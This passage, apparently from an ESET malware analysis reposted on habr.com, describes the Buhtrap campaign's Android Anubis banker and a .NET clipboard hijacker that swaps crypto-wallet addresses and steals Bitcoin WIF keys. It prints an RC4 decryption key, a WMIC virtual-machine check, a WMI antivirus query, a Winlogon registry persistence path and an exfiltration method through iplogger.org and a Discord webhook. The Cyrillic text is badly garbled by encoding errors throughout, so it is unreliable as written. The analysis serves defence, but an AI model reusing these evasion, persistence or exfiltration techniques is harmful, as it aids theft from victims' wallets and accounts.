Π˜Π½Ρ‚Π΅Ρ€Π΅ΡΠ½ΠΎ, Ρ‡Ρ‚ΠΎ Π² Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΈ GitHub Π±Ρ‹Π» Π½Π°ΠΉΠ΄Π΅Π½ ΠΈ ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ для Android. Он Π±Ρ‹Π» Π² основной Π²Π΅Ρ‚ΠΊΠ΅ всСго ΠΎΠ΄ΠΈΠ½ дСнь – 1 ноября 2018 Π³ΠΎΠ΄Π°. Помимо размСщСния Π½Π° GitHub, тСлСмСтрия ESET Π½Π΅ Π½Π°Ρ…ΠΎΠ΄ΠΈΡ‚ ΡΠ²ΠΈΠ΄Π΅Ρ‚Π΅Π»ΡŒΡΡ‚Π² распространСния этого врСдоносного ПО.

ΠšΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ размСщался ΠΊΠ°ΠΊ Android Application Package (APK). Он сильно обфусцирован. ВрСдоносноС ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ скрыто Π² Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠΌ JAR, располоТСнном Π² APK. Он Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ ΠΏΠΎ RC4 с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ этого ΠΊΠ»ΡŽΡ‡Π°:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

Π’ΠΎΡ‚ ΠΆΠ΅ ΠΊΠ»ΡŽΡ‡ ΠΈ Π°Π»Π³ΠΎΡ€ΠΈΡ‚ΠΌ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ для ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΡ строк. JAR располоТСн Π² APK_ROOT + image/files. ΠŸΠ΅Ρ€Π²Ρ‹Π΅ 4 Π±Π°ΠΉΡ‚Π° Ρ„Π°ΠΉΠ»Π° содСрТат Π΄Π»ΠΈΠ½Ρƒ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ JAR, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ начинаСтся нСпосрСдствСнно послС поля Π΄Π»ΠΈΠ½Ρ‹.

Π Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π² Ρ„Π°ΠΉΠ», ΠΌΡ‹ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ»ΠΈ, Ρ‡Ρ‚ΠΎ это Anubis – Ρ€Π°Π½Π΅Π΅ Π·Π°Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Π±Π°Π½ΠΊΠ΅Ρ€ для Android. ВрСдоносноС ПО ΠΈΠΌΠ΅Π΅Ρ‚ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ:

  • запись с ΠΌΠΈΠΊΡ€ΠΎΡ„ΠΎΠ½Π°
  • созданиС ΡΠΊΡ€ΠΈΠ½ΡˆΠΎΡ‚ΠΎΠ²
  • ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ GPS-ΠΊΠΎΠΎΡ€Π΄ΠΈΠ½Π°Ρ‚
  • ΠΊΠ΅ΠΉΠ»ΠΎΠ³Π³Π΅Ρ€
  • ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½ΠΈΠ΅ Π΄Π°Π½Π½Ρ‹Ρ… устройства ΠΈ Ρ‚Ρ€Π΅Π±ΠΎΠ²Π°Π½ΠΈΠ΅ Π²Ρ‹ΠΊΡƒΠΏΠ°
  • рассылка спама

Π§Ρ‚ΠΎ интСрСсно, Π±Π°Π½ΠΊΠ΅Ρ€ использовал Twitter Π² качСствС Ρ€Π΅Π·Π΅Ρ€Π²Π½ΠΎΠ³ΠΎ ΠΊΠ°Π½Π°Π»Π° ΠΊΠΎΠΌΠΌΡƒΠ½ΠΈΠΊΠ°Ρ†ΠΈΠΈ для получСния Π΄Ρ€ΡƒΠ³ΠΎΠ³ΠΎ C&C-сСрвСра. ΠŸΡ€ΠΎΠ°Π½Π°Π»ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Π½Π°ΠΌΠΈ ΠΎΠ±Ρ€Π°Π·Π΅Ρ† использовал Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚ @JohnesTrader, Π½ΠΎ Π½Π° ΠΌΠΎΠΌΠ΅Π½Ρ‚ Π°Π½Π°Π»ΠΈΠ·Π° ΠΎΠ½ ΡƒΠΆΠ΅ Π±Ρ‹Π» Π·Π°Π±Π»ΠΎΠΊΠΈΡ€ΠΎΠ²Π°Π½.

Π‘Π°Π½ΠΊΠ΅Ρ€ содСрТит список Ρ†Π΅Π»Π΅Π²Ρ‹Ρ… ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ Π½Π° устройствС Android. Он стал Π΄Π»ΠΈΠ½Π½Π΅Π΅, Ρ‡Π΅ΠΌ список, ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ Π² Ρ…ΠΎΠ΄Π΅ исслСдования Sophos. Π’ спискС мноТСство ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ Π±Π°Π½ΠΊΠΎΠ², ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ для ΠΎΠ½Π»Π°ΠΉΠ½-шоппинга, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ Amazon ΠΈ eBay, ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚Π½Ρ‹Π΅ сСрвисы.

MSIL/ClipBanker.IH

ПослСдний ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ распространялся Π² Ρ€Π°ΠΌΠΊΠ°Ρ… этой ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ – исполняСмый Ρ„Π°ΠΉΠ» .NET Windows, появившийся Π² ΠΌΠ°Ρ€Ρ‚Π΅ 2019 Π³ΠΎΠ΄Π°. Π‘ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ ΠΈΠ·ΡƒΡ‡Π΅Π½Π½Ρ‹Ρ… вСрсий Π±Ρ‹Π»ΠΈ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Ρ‹ ConfuserEx v1.0.0. Как ΠΈ ClipBanker, этот ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ Π±ΡƒΡ„Π΅Ρ€ ΠΎΠ±ΠΌΠ΅Π½Π°. Π•Π³ΠΎ Ρ†Π΅Π»ΡŒ – ΡˆΠΈΡ€ΠΎΠΊΠΈΠΉ Π΄ΠΈΠ°ΠΏΠ°Π·ΠΎΠ½ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΎΡ„Ρ„Π΅Ρ€Ρ‹ Π² Steam. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, ΠΎΠ½ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ слуТбу IP Logger для ΠΊΡ€Π°ΠΆΠΈ Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ WIF ΠΊΠ»ΡŽΡ‡Π° Bitcoin.

ΠœΠ΅Ρ…Π°Π½ΠΈΠ·ΠΌΡ‹ Π·Π°Ρ‰ΠΈΡ‚Ρ‹
Π’Π΄ΠΎΠ±Π°Π²ΠΎΠΊ ΠΊ прСимущСствам, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π΄Π°Π΅Ρ‚ ConfuserEx Π² Π²ΠΈΠ΄Π΅ противодСйствия ΠΎΡ‚Π»Π°Π΄ΠΊΠ΅, Π΄Π°ΠΌΠΏΡƒ ΠΈ Π²ΠΌΠ΅ΡˆΠ°Ρ‚Π΅Π»ΡŒΡΡ‚Π²Ρƒ Π² Ρ€Π°Π±ΠΎΡ‚Ρƒ, Π² ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Π΅ Ρ€Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π° Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ дСтСктирования антивирусных ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Ρ… машин.

Для ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ запуска Π² Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½ΠΎΠΉ машинС врСдоносноС ПО ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ Π²ΡΡ‚Ρ€ΠΎΠ΅Π½Π½ΡƒΡŽ Π² Windows ΠΊΠΎΠΌΠ°Π½Π΄Π½ΡƒΡŽ строку WMI (WMIC) для запроса ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ BIOS, Π° ΠΈΠΌΠ΅Π½Π½ΠΎ:

wmic bios

Π—Π°Ρ‚Π΅ΠΌ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° парсит Π²Ρ‹Π²ΠΎΠ΄ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ ΠΈ ΠΈΡ‰Π΅Ρ‚ ΠΊΠ»ΡŽΡ‡Π΅Π²Ρ‹Π΅ слова: VBOX, VirtualBox, XEN, qemu, bochs, VM.

Для обнаруТСния антивирусных ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² врСдоносноС ПО отправляСт Windows Management Instrumentation (WMI) запрос Π² Windows Security Center с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ManagementObjectSearcher API ΠΊΠ°ΠΊ ΠΏΠΎΠΊΠ°Π·Π°Π½ΠΎ Π½ΠΈΠΆΠ΅. ПослС дСкодирования ΠΈΠ· base64 Π²Ρ‹Π·ΠΎΠ² выглядит Ρ‚Π°ΠΊ:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚
Рисунок 3. ΠŸΡ€ΠΎΡ†Π΅ΡΡ опрСдСлСния антивирусных ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ².

ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, врСдоносноС ПО провСряСт, Π½Π΅ Π·Π°ΠΏΡƒΡ‰Π΅Π½ Π»ΠΈ CryptoClipWatcher, инструмСнт для Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΎΡ‚ Π°Ρ‚Π°ΠΊ Π½Π° Π±ΡƒΡ„Π΅Ρ€ ΠΎΠ±ΠΌΠ΅Π½Π°, ΠΈ, Ссли ΠΎΠ½ Π·Π°ΠΏΡƒΡ‰Π΅Π½, приостанавливаСт всС ΠΏΠΎΡ‚ΠΎΠΊΠΈ этого процСсса, Ρ‚Π΅ΠΌ самым Π²Ρ‹ΠΊΠ»ΡŽΡ‡Π°Ρ Π·Π°Ρ‰ΠΈΡ‚Ρƒ.

ΠŸΠ΅Ρ€ΡΠΈΡΡ‚Π΅Π½Ρ‚Π½ΠΎΡΡ‚ΡŒ

Π˜Π·ΡƒΡ‡Π΅Π½Π½Π°Ρ Π½Π°ΠΌΠΈ вСрсия врСдоносного ПО ΠΊΠΎΠΏΠΈΡ€ΡƒΠ΅Ρ‚ сСбя Π² %APPDATA%googleupdater.exe ΠΈ выставляСт Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ «скрытый» для Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ google. Π—Π°Ρ‚Π΅ΠΌ ΠΎΠ½Π° измСняСт Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Π² рССстрС Windows ΠΈ добавляСт ΠΏΡƒΡ‚ΡŒ updater.exe. Π’Π°ΠΊ врСдоносноС ПО Π±ΡƒΠ΄Π΅Ρ‚ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒΡΡ ΠΏΡ€ΠΈ ΠΊΠ°ΠΆΠ΄ΠΎΠΌ Π²Ρ…ΠΎΠ΄Π΅ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ.

ВрСдоносноС ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅

Как ΠΈ ClipBanker, врСдоносноС ПО отслСТиваСт содСрТимоС Π±ΡƒΡ„Π΅Ρ€Π° ΠΎΠ±ΠΌΠ΅Π½Π° ΠΈ ΠΈΡ‰Π΅Ρ‚ адрСса ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚Π½Ρ‹Ρ… кошСльков, Π° ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ², замСняСт Π΅Π³ΠΎ ΠΎΠ΄Π½ΠΈΠΌ ΠΈΠ· адрСсов ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Π°. НиТС ΠΏΠΎΠΊΠ°Π·Π°Π½ список Ρ†Π΅Π»Π΅Π²Ρ‹Ρ… адрСсов Π½Π° основании Π½Π°ΠΉΠ΄Π΅Π½Π½ΠΎΠ³ΠΎ Π² ΠΊΠΎΠ΄Π΅.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Для ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ ΠΈΠ· Ρ‚ΠΈΠΏΠΎΠ² адрСсов Π΅ΡΡ‚ΡŒ ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰Π΅Π΅ рСгулярноС Π²Ρ‹Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅. Π—Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ STEAM_URL ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ для Π°Ρ‚Π°ΠΊΠΈ Π½Π° систСму Steam, ΠΊΠ°ΠΊ Π²ΠΈΠ΄Π½ΠΎ ΠΈΠ· рСгулярного выраТСния, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ для опрСдСлСния Π² Π±ΡƒΡ„Π΅Ρ€Π΅:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

Канал ΡΠΊΡΡ„ΠΈΠ»ΡŒΡ‚Ρ€Π°Ρ†ΠΈΠΈ

Помимо Π·Π°ΠΌΠ΅Π½Ρ‹ адрСсов Π² Π±ΡƒΡ„Π΅Ρ€Π΅, врСдоносноС ПО Π½Π°Ρ†Π΅Π»Π΅Π½ΠΎ Π½Π° Π·Π°ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ WIF-ΠΊΠ»ΡŽΡ‡ΠΈ Bitcoin, Bitcoin Core ΠΈ Electrum Bitcoin кошСльки. ΠŸΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ plogger.org Π² качСствС ΠΊΠ°Π½Π°Π»Π° ΡΠΊΡΡ„ΠΈΠ»ΡŒΡ‚Ρ€Π°Ρ†ΠΈΠΈ для получСния Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ΠΊΠ»ΡŽΡ‡Π° WIF. Для этого ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ Π΄ΠΎΠ±Π°Π²Π»ΡΡŽΡ‚ Π΄Π°Π½Π½Ρ‹Π΅ Π·Π°ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ΠΊΠ»ΡŽΡ‡Π° Π² Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΎΠΊ User-Agent HTTP, ΠΊΠ°ΠΊ ΠΏΠΎΠΊΠ°Π·Π°Π½ΠΎ Π½ΠΈΠΆΠ΅.

Бэкдор ΠΈ ΡˆΠΈΡ„Ρ€Π°Ρ‚ΠΎΡ€ Buhtrap Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΠ»ΠΈΡΡŒ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ЯндСкс.Π”ΠΈΡ€Π΅ΠΊΡ‚
Рисунок 4. Консоль IP Logger с Π²Ρ‹Π²Π΅Π΄Π΅Π½Π½Ρ‹ΠΌΠΈ Π΄Π°Π½Π½Ρ‹ΠΌΠΈ.

Для ΡΠΊΡΡ„ΠΈΠ»ΡŒΡ‚Ρ€Π°Ρ†ΠΈΠΈ кошСльков ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ Π½Π΅ стали ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ iplogger.org. ВСроятно, ΠΎΠ½ΠΈ ΠΏΡ€ΠΈΠ±Π΅Π³Π»ΠΈ ΠΊ ΠΈΠ½ΠΎΠΌΡƒ ΠΌΠ΅Ρ‚ΠΎΠ΄Ρƒ ΠΏΠΎ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π΅ ограничСния Π² 255 символов Π² ΠΏΠΎΠ»Π΅ User-Agent, ΠΎΡ‚ΠΎΠ±Ρ€Π°ΠΆΠ°Π΅ΠΌΡ‹Ρ… Π² Π²Π΅Π±-интСрфСйсС IP Logger. Π’ ΠΈΠ·ΡƒΡ‡Π΅Π½Π½Ρ‹Ρ… Π½Π°ΠΌΠΈ ΠΎΠ±Ρ€Π°Π·Ρ†Π°Ρ… Π΄Ρ€ΡƒΠ³ΠΎΠΉ сСрвСр для Π²Ρ‹Π²ΠΎΠ΄Π° Π΄Π°Π½Π½Ρ‹Ρ… хранился Π² ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ срСды DiscordWebHook. Π§Ρ‚ΠΎ ΡƒΠ΄ΠΈΠ²ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ, эта пСрСмСнная срСды Π½ΠΈΠ³Π΄Π΅ Π² ΠΊΠΎΠ΄Π΅ Π½Π΅ назначаСтся. Π­Ρ‚ΠΎ Π΄Π°Π΅Ρ‚ основания ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»Π°Π³Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ врСдоносная ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° ΠΏΠΎΠΊΠ° находится Π² стадии Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠΈ, ΠΈ пСрСмСнная Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π° Π½Π° тСстовой машинС ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Π°.

Π•ΡΡ‚ΡŒ ΠΈ Π΄Ρ€ΡƒΠ³ΠΎΠΉ ΠΏΡ€ΠΈΠ·Π½Π°ΠΊ Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° Π² Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠ΅. Π‘ΠΈΠ½Π°Ρ€Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» Π²ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ Π΄Π²Π° URL iplogger.org, ΠΈ ΠΊ ΠΎΠ±ΠΎΠΈΠΌ направляСтся запрос ΠΏΡ€ΠΈ ΡΠΊΡΡ„ΠΈΠ»ΡŒΡ‚Ρ€Π°Ρ†ΠΈΠΈ Π΄Π°Π½Π½Ρ‹Ρ…. Π’ запросС ΠΊ ΠΎΠ΄Π½ΠΎΠΌΡƒ ΠΈΠ· этих URL Π·Π½Π°Ρ‡Π΅Π½ΠΈΡŽ Π² ΠΏΠΎΠ»Π΅ Referer ΠΏΡ€Π΅Π΄ΡˆΠ΅ΡΡ‚Π²ΡƒΠ΅Ρ‚ β€œDEV /”. ΠœΡ‹ Ρ‚Π°ΠΊΠΆΠ΅ нашли Π²Π΅Ρ€ΡΠΈΡŽ, которая Π½Π΅ Π±Ρ‹Π»Π° ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π° с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ConfuserEx, ΠΏΠΎΠ»ΡƒΡ‡Π°Ρ‚Π΅Π»ΡŒ для этого URL Π½Π°Π·Π²Π°Π½ DevFeedbackUrl. На основании ΠΈΠΌΠ΅Π½ΠΈ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ срСды ΠΌΡ‹ считаСм, Ρ‡Ρ‚ΠΎ ΠΎΠΏΠ΅Ρ€Π°Ρ‚ΠΎΡ€Ρ‹ ΠΏΠ»Π°Π½ΠΈΡ€ΡƒΡŽΡ‚ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹ΠΉ сСрвис Discord ΠΈ Π΅Π³ΠΎ систСму Π²Π΅Π±-ΠΏΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‚Π° для ΠΊΡ€Π°ΠΆΠΈ ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ²Π°Π»ΡŽΡ‚Π½Ρ‹Ρ… кошСльков.

Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅

Данная кампания – ΠΏΡ€ΠΈΠΌΠ΅Ρ€ использования Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹Ρ… Ρ€Π΅ΠΊΠ»Π°ΠΌΠ½Ρ‹Ρ… сСрвисов Π² ΠΊΠΈΠ±Π΅Ρ€Π°Ρ‚Π°ΠΊΠ°Ρ…. Π‘Ρ…Π΅ΠΌΠ° Π½Π°Ρ†Π΅Π»Π΅Π½Π° Π½Π° российскиС ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ, Π½ΠΎ ΠΌΡ‹ Π½Π΅ удивимся, ΡƒΠ²ΠΈΠ΄Π΅Π² Ρ‚Π°ΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ с использованиСм нСроссийских сСрвисов. Π§Ρ‚ΠΎΠ±Ρ‹ ΠΈΠ·Π±Π΅ΠΆΠ°Ρ‚ΡŒ ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ, ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Π΄ΠΎΠ»ΠΆΠ½Ρ‹ Π±Ρ‹Ρ‚ΡŒ ΡƒΠ²Π΅Ρ€Π΅Π½Ρ‹ Π² Ρ€Π΅ΠΏΡƒΡ‚Π°Ρ†ΠΈΠΈ источника скачиваСмого ПО.

ΠŸΠΎΠ»Π½Ρ‹ΠΉ список ΠΈΠ½Π΄ΠΈΠΊΠ°Ρ‚ΠΎΡ€ΠΎΠ² ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ ΠΈ Π°Ρ‚Ρ€ΠΈΠ±ΡƒΡ‚ΠΎΠ² MITRE ATT&CK доступСн ΠΏΠΎ ссылкС.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: habr.com